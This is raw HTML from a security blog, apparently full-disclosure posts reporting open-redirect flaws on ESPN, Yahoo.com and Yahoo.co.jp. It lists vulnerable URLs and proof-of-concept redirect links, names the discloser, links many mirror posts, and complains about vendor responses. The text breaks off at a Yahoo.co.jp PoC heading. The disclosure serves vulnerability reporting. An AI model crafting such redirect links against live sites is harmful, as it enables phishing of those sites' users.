<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
<a href="http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=http%3A%2F%2Fgoogle.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/<wbr></wbr>wdgwespdeportes/5.4/REDIR/<wbr></wbr>065639236847243821390018102438<wbr></wbr>?D=..&url=http%3A%2F%2Fgoogle.<wbr></wbr>com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 3:</span></b></div>
<div>
<a href="http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=https%3A%2F%2Ftwitter.com%2FYahoo%2Fhao123%2Fstatus%2Fyandex%2F%2Fru%2F541950359917580289" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/<wbr></wbr>wdgespw/5.4/REDIR/<wbr></wbr>088360294087348871389981133993<wbr></wbr>?D=..&url=https%3A%2F%<wbr></wbr>2Ftwitter.com%2FYahoo%<wbr></wbr>2Fhao123%2Fstatus%2Fyandex%2F%<wbr></wbr>2Fru%2F541950359917580289</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></div>
<div>
<a href="http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=http%3A%2F%2Fgoogle.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/<wbr></wbr>wdgespw/5.4/REDIR/<wbr></wbr>088360294087348871389981133993<wbr></wbr>?D=..&url=http%3A%2F%2Fgoogle.<wbr></wbr>com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Poc Video:</span></b></div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=lCvBt8Elj9w&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=lCvBt8Elj9w&feature=youtu.be</a></span></div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></b></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/espn-espn.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.sg/2014/12/espn-espn.html</a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3) </b>Those security problems were reported to ESPN in early 2014. However, they are still unpatched.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2014/Dec/36">http://seclists.org/fulldisclosure/2014/Dec/36</a></span><br />
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01417.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01417.html</span></a><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1303"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1303</span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss_9.html">http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register</a></span><br />
<a href="http://diebiyi.com/articles/security/espn-xss-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/espn-xss-open-redirect/</span></a><br />
<a href="https://infoswift.wordpress.com/2014/12/30/espn-are-suffering-serious-xss-and-dest-redirect-privilege-escalation-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://infoswift.wordpress.com/2014/12/30/espn-are-suffering-serious-xss-and-dest</span></a><br />
<a href="http://webcabinet.tumblr.com/post/118510631147/espn-are-suffering-serious-xss-and-dest-redirect#notes"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webcabinet.tumblr.com/post/118510631147/espn-are-suffering-serious-xss</span></a><br />
<a href="https://www.facebook.com/permalink.php?story_fbid=435630669942495&id=361076084064621" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/<wbr></wbr>permalink.php?story_fbid=<wbr></wbr>435630669942495</span></a><br />
<a href="http://guyuzui.lofter.com/post/1ccdcda4_6e6b17e"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://guyuzui.lofter.com/post/1ccdcda4_6e6b17e</span></a><br />
<a href="http://mathswift.blogspot.com/2015/05/espn-are-suffering-serious-xss-and-dest.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://mathswift.blogspot.com/2015/05/espn-are-suffering-serious-xss-and-dest.html</span></a><br />
<a href="http://inzeed.tumblr.com/post/120775132901/espn-xss-open-redirect" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://inzeed.tumblr.com/post/<wbr></wbr>120775132901/espn-xss-open-<wbr></wbr>redirect</span></a><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ittechnology.lofter.com/post/1cfbf60d_730f11d" target="_blank">http://ittechnology.lofter.<wbr></wbr>com/post/1cfbf60d_730f11d</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://whitehatpost.blog.163.com/blog/static/2422320542015551014553/" target="_blank">http://whitehatpost.blog.163.<wbr></wbr>com/blog/static/<wbr></wbr>2422320542015551014553/</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://zuiyuxiang.wordpress.com/2014/12/19/espn-xss-open-redirect/">https://zuiyuxiang.wordpress.com/2014/12/19/espn-xss-open-redirect/</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/permalink.php?story_fbid=1631949187023558&id=1567915086760302" target="_blank">https://www.facebook.com/<wbr></wbr>permalink.php?story_fbid=<wbr></wbr>1631949187023558</a></span></div>
<div>
<a href="https://twitter.com/tetraphibious/status/606824322896785408" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/<wbr></wbr>tetraphibious/status/<wbr></wbr>606824322896785408</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://plus.google.com/u/0/110001022997295385049/posts/TBiJP5A3CXg" target="_blank">https://plus.google.com/u/0/<wbr></wbr>110001022997295385049/posts/<wbr></wbr>TBiJP5A3CXg</a></span></div>
<div>
<a href="http://xingzhehong.lofter.com/post/1cfd0db2_6e68fe3"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://xingzhehong.lofter.com/post/1cfd0db2_6e68fe3</span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.tetraph.com/blog/computing-science/espn-xss-open-redirect/">http://www.tetraph.com/blog/computing-science/espn-xss-open-redirect/</a><br /><br /><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<br />
<br />
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
</div>
</div>
<br />
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-27754121093704243682015-06-05T04:47:00.000-07:002015-06-05T05:54:05.233-07:00Yahoo Yahoo.com Yahoo.co.jp Open Redirect (Unvalidated Redirects and Forwards) Web Security Bugs<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-PqJ0aXNHYMc/VXGKPKs0jkI/AAAAAAAAA_E/ofUPLfxPNDY/s1600/yahoo_japan.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://3.bp.blogspot.com/-PqJ0aXNHYMc/VXGKPKs0jkI/AAAAAAAAA_E/ofUPLfxPNDY/s400/yahoo_japan.png" width="400" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><b><br /></b>
<b>Yahoo Yahoo.com <a href="http://yahoo.co.jp/" target="_blank">Yahoo.co.jp</a> Open Redirect (Unvalidated Redirects and Forwards) Web Security Bugs</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Though Yahoo lists open redirect vulnerability on its bug bounty program. However, it seems Yahoo do not take this vulnerability seriously at all.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Multiple Open Redirect vulnerabilities were reported Yahoo. All Yahoo's responses were "It is working as designed". However, these vulnerabilities were patched later.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Several other security researcher complained about getting similar treatment, too.</span></div>
<div>
<a href="http://seclists.org/fulldisclosure/2014/Jan/51" style="-webkit-transition: color 0.3s; display: inline; line-height: 19.6000003814697px; outline: none; text-align: justify; text-decoration: none; transition: color 0.3s;" target="_blank"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/<wbr></wbr>fulldisclosure/2014/Jan/51</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2014/Feb/119" style="background-color: white;" target="_blank">http://seclists.org/<wbr></wbr>fulldisclosure/2014/Feb/119</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">All Open Redirect Vulnerabilities are intended behavior? If so, why patch them later?</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<div>
<a href="http://4.bp.blogspot.com/-Pd0biilpq0A/VJOvjidlEYI/AAAAAAAAAjA/P1z9No2c1dE/s1600/yahoo_wont_fix_meitu_1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="115" src="http://4.bp.blogspot.com/-Pd0biilpq0A/VJOvjidlEYI/AAAAAAAAAjA/P1z9No2c1dE/s1600/yahoo_wont_fix_meitu_1.jpg" width="400" /></span></a></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />From report of CNET, Yahoo's users were attacked by redirection vulnerabilities. "Yahoo.com visitors over the last few days may have been served with malware via the Yahoo ad network, according to Fox IT, a security firm in the Netherlands. Users visiting pages with the malicious ads were redirected to sites armed with code that exploits vulnerabilities in Java and installs a variety of different malware. " </span><br />
<a href="http://www.cnet.com/news/yahoo-users-exposed-to-malware-attack/"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://www.cnet.com/news/<wbr></wbr>yahoo-users-exposed-to-<wbr></wbr>malware-attack/</span></a><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />
Moreover, since Yahoo is well-known worldwide. these vulnerabilities can be used to attack other companies such as Google, eBay, The New York Times, Amazon, Godaddy, Alibaba, Netease, e.g. by bypassing their Open Redirect filters (<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>). These cyber security bug problems have not been patched. Other similar web and computer flaws will be published in the near future.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />
<br />
The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7. </span></div>
</div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
</span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />
</span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Disclosed by:</span></div>
<div>
<div>
<div style="padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><span style="line-height: 17.8181819915772px; text-align: justify;">Jing Wang, </span><span style="line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="text-align: justify;"><span style="line-height: 17.8181819915772px;">Singapore. (</span><a href="https://twitter.com/justqdjing/status/534330655891419136" style="line-height: 28px;">@justqdjing</a><span style="line-height: 17.8181819915772px;">)</span></span></span></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><a href="http://www.tetraph.com/wangjing/" style="line-height: 28px; text-align: justify;">http://www.tetraph.com/<wbr></wbr>wangjing</a></span></div>
</div>
</div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />
Both Yahoo and Yahoo Japan online web application has a computer cyber security bug problem. It can be exploited by Unvalidated Redirects and Forwards (URL Redirection) attacks. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful as the crafted URL initially appear to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
</span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white;"><br /></span>
</span><br />
<div>
</div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white;"><br /></span>
</span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">BugTraq is a full disclosure moderated mailing list for the *detailed* discussion and announcement of computer security vulnerabilities: what they are, how to exploit them, and how to fix them. The below things be posted to the Bugtraq list: (a) Information on computer or network related security vulnerabilities (UNIX, Windows NT, or any other). (b) Exploit programs, scripts or detailed processes about the above. (c) Patches, workarounds, fixes. (d) Announcements, advisories or warnings. (e) Ideas, future plans or current works dealing with computer/network security. (f) Information material regarding vendor contacts and procedures. (g) Individual experiences in dealing with above vendors or security organizations. (h) Incident advisories or informational reporting. (i) New or updated security tools. A large number of the fllowing web securities have been published here, Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, Unvalidated Redirects and Forwards. It also publishes suggestions, advisories, solutions details related to Open Redirect vulnerabilities and cyber intelligence recommendations.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />
</span></div>
</div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">(1) Yahoo.com Open Redirect</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;"><br /></b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><b><br /></b>
<b>Domain:</b></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">yahoo.com</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
"Yahoo Inc. (styled as Yahoo!) is an American multinational technology company headquartered in Sunnyvale, California. It is globally known for its Web portal, search engine Yahoo Search, and related services, including Yahoo Directory, Yahoo Mail, Yahoo News, Yahoo Finance, Yahoo Groups, Yahoo Answers, advertising, online mapping, video sharing, fantasy sports and its social media website. It is one of the most popular sites in the United States. According to news sources, roughly 700 million people visit Yahoo websites every month. Yahoo itself claims it attracts more than half a billion consumers every month in more than 30 languages. Yahoo was founded by Jerry Yang and David Filo in January 1994 and was incorporated on March 1, 1995. Marissa Mayer, a former Google executive, serves as CEO and President of the company." (Wikipedia)</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />
</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">Vulnerable URLs:</b></span></div>
<div>
<a href="http://p2.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://help.yahoo.com/help/us/local/index.html" target="_blank"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://p2.ard.sp1.yahoo.com/<wbr></wbr>SIG=153ldvf0k/M=289534.<wbr></wbr>11126839.11694361.10790529/D=<wbr></wbr>local/S=2022555687:FOOT3/Y=<wbr></wbr>YAHOO/EXP=1237445081/L=<wbr></wbr>ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0<wbr></wbr>nBzbYACrCK/B=ygUAANiRN9w-/J=<wbr></wbr>1237437881452401/A=4763404/R=<wbr></wbr>8/*http://help.yahoo.com/help/<wbr></wbr>us/local/index.html</span></a></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="http://p3.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com" target="_blank"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://p3.ard.sp1.yahoo.com/<wbr></wbr>SIG=153ldvf0k/M=289534.<wbr></wbr>11126839.11694361.10790529/D=<wbr></wbr>local/S=2022555687:FOOT3/Y=<wbr></wbr>YAHOO/EXP=1237445081/L=<wbr></wbr>ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0<wbr></wbr>nBzbYACrCK/B=ygUAANiRN9w-/J=<wbr></wbr>1237437881452401/A=4763404/R=<wbr></wbr>8/*http://www.google.com</span></a></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="http://p4.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com" target="_blank"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://p4.ard.sp1.yahoo.com/<wbr></wbr>SIG=153ldvf0k/M=289534.<wbr></wbr>11126839.11694361.10790529/D=<wbr></wbr>local/S=2022555687:FOOT3/Y=<wbr></wbr>YAHOO/EXP=1237445081/L=<wbr></wbr>ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0<wbr></wbr>nBzbYACrCK/B=ygUAANiRN9w-/J=<wbr></wbr>1237437881452401/A=4763404/R=<wbr></wbr>8/*http://www.google.com</span></a></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">Poc Video:</b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=k4eFLsTyZkg" style="background-color: white;">https://www.youtube.com/watch?v=k4eFLsTyZkg</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /><b>Another Yahoo Open Rediect Vulnerability Video Published Before:</b></span></div>
<div>
<a href="https://www.youtube.com/watch?v=GTd1Gkj6OUY" target="_blank"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?<wbr></wbr>v=GTd1Gkj6OUY</span></a></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">Blog:</b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-open-redirect-security.html" style="background-color: white;">http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-open-redirect-security.html</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2014/10/yahoo-open-redirect-vulnerability.html" style="background-color: white;">http://securityrelated.blogspot.com/2014/10/yahoo-open-redirect-vulnerability.html</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">(2) <a href="http://yahoo.co.jp/" target="_blank">Yahoo.co.jp</a> Open Redirect</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />
<b>Domain:</b></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">yahoo.co.jp</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"Yahoo! JAPAN Corporation (ヤフージャパン株式会社 Yafū Japan Kabushiki-gaisha?) is a Japanese internet company formed as a joint venture between the American internet company Yahoo! and the Japanese internet company SoftBank. It is headquartered at Midtown Tower in the Tokyo Midtown complex in Akasaka, Minato, Tokyo. Yahoo! Japan was listed on JASDAQ in November 1997. In January 2000, it became the first stock in Japanese history to trade for more than ¥100 million per share. The company was listed on the Tokyo Stock Exchange in October 2003 and became part of the Nikkei 225 stock market index in 2005. Yahoo! Japan acquired the naming rights for the Fukuoka Dome in 2005, renaming the dome as the "Fukuoka Yahoo! Japan Dome". The "Yahoo Dome" is the home field for the Fukuoka SoftBank Hawks, a professional baseball team majority owned by SoftBank." (Wikipedia)</span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Use one of webpages for the following tests. The webpage address is "<a href="http://itinfotech.tumblr.com/">http://itinfotech.tumblr.com/</a>". Suppose that this webpage is malicious.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
</span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">Vulnerable URL:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030344&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http%3A%2F%2Fshopping.yahoo.co.jp" style="background-color: white;" target="_blank">http://order.store.yahoo.co.<wbr></wbr>jp/cgi-bin/yj-affiliate-entry?<wbr></wbr>ITRACK_INFO=<wbr></wbr>087836355102152107140219030344<wbr></wbr>&COOKIE_PATH=/&COOKIE_DOMAIN=.<wbr></wbr>yahoo.co.jp&VIEW_URL=http%3A%<wbr></wbr>2F%2Fshopping.yahoo.co.jp</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">POC:</b></span></div>
<div>
